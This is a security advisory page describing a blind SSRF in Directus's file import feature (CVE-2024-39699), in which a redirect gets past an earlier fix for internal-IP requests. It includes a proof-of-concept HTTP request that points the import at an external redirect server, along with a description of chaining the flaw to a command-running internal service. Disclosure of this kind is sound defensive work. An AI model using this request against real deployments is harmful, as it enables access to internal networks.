Ecosyste.ms: Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

Security Advisories: GSA_kwCzR0hTQS04cDcyLXJjcTQtaDZwd84AA9n5

Directus Blind SSRF On File Import

Summary

There was already a reported SSRF vulnerability via file import. https://github.com/directus/directus/security/advisories/GHSA-j3rg-3rgm-537h
It was fixed by resolving all DNS names and checking if the requested IP is an internal IP address.

However it is possible to bypass this security measure and execute a SSRF using redirects. Directus allows redirects when importing file from the URL and does not check the result URL. Thus, it is possible to execute a request to an internal IP, for example to 127.0.0.1.

However, it is blind SSRF, because Directus also uses response interception technique to get the information about the connect from the socket directly and it does not show a response if the IP address is internal (nice fix, by the way :) ).

But the blindness does not fully mitigate the impact of the vulnerability. The blind SSRF is still exploitable in the real life scenarios, because there could be a vulnerable software inside of the network which can be exploited with GET request. I will show the example in the PoC. Also, you can check HackTricks page with some known cases.

Details

Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer.

PoC

For testing I used the docker compose with the latest directus version. Here is my docker compose file

version: "3"
services:
  directus:
    image: directus/directus:10.8.3
    ports:
      - 8055:8055
    volumes:
      - ./database:/directus/database
      - ./uploads:/directus/uploads
      - ./extensions:/directus/extensions
    environment:
      KEY: "redacted"
      SECRET: "redacted"
      ADMIN_EMAIL: "[email protected]"
      ADMIN_PASSWORD: "redacted"
      DB_CLIENT: "sqlite3"
      DB_FILENAME: "/directus/database/data.db"

As a first step it is needed to setup a redirect server which will redirect the incoming request to some internal URL. I did it on my VPS with the public IP.

After it I setup a simple HTTP Server emulating the vulnerable application inside the internal network. It just execute any shell command provided in the cmd GET-parameter.

After it the directus import functionality was used

It initiates the following HTTP request

POST /files/import HTTP/1.1
Host: 127.0.0.1:8055
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Authorization: Bearer redacteed
Content-Type: application/json
Content-Length: 44
Origin: http://127.0.0.1:8055
Connection: close
Referer: http://127.0.0.1:8055/admin/files/+
Cookie: directus_refresh_token=redacted
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

{"url":"http://94.103.84.233:801","data":{}}

It can be seen on the redirect server that the request came to it.

And we can also see the request in the localhost server (the same host as directus), which confirms the bypass and the SSRF.

And the rce_poc file was created.

Impact

The impact is Blind SSRF. Using it an attacker can initiate HTTP GET requests to the internal network. For example, it can be used to exploit some GET-based vulnerabilities of other software in the internal network.

Fix proposition

I think there are two ways to fix this vulnerability:

Permalink: https://github.com/advisories/GHSA-8p72-rcq4-h6pw
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04cDcyLXJjcTQtaDZwd84AA9n5
Source: GitHub Advisory Database
Origin: Unspecified
Severity: Moderate
Classification: General
Published: 9 days ago
Updated: 9 days ago


CVSS Score: 5.0
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N

Identifiers: GHSA-8p72-rcq4-h6pw, CVE-2024-39699
References: Repository: https://github.com/directus/directus
Blast Radius: 9.9

Affected Packages

npm:@directus/api
Dependent packages: 9
Dependent repositories: 95
Downloads: 50,990 last month
Affected Version Ranges: < 17.1.0
Fixed in: 17.1.0
All affected versions: 9.25.0, 9.25.1, 9.25.2, 9.26.0, 10.0.0, 10.1.0, 10.2.0, 11.0.0, 11.0.1, 11.1.0, 12.0.0, 12.0.1, 12.0.2, 12.0.3, 12.1.0, 12.1.1, 12.1.2, 12.1.3, 13.0.0, 13.1.0, 13.1.1, 13.2.0, 14.0.0, 14.0.1, 14.0.2, 14.1.0, 14.1.1, 14.1.2, 15.0.0, 16.0.0, 17.0.0, 17.0.1
All unaffected versions: 17.1.0, 18.0.0, 18.1.0, 18.1.1, 18.2.0, 18.2.1, 19.0.0, 19.0.1, 19.0.2, 19.1.0, 19.1.1, 19.2.0, 19.3.0, 19.3.1, 20.0.0, 20.1.0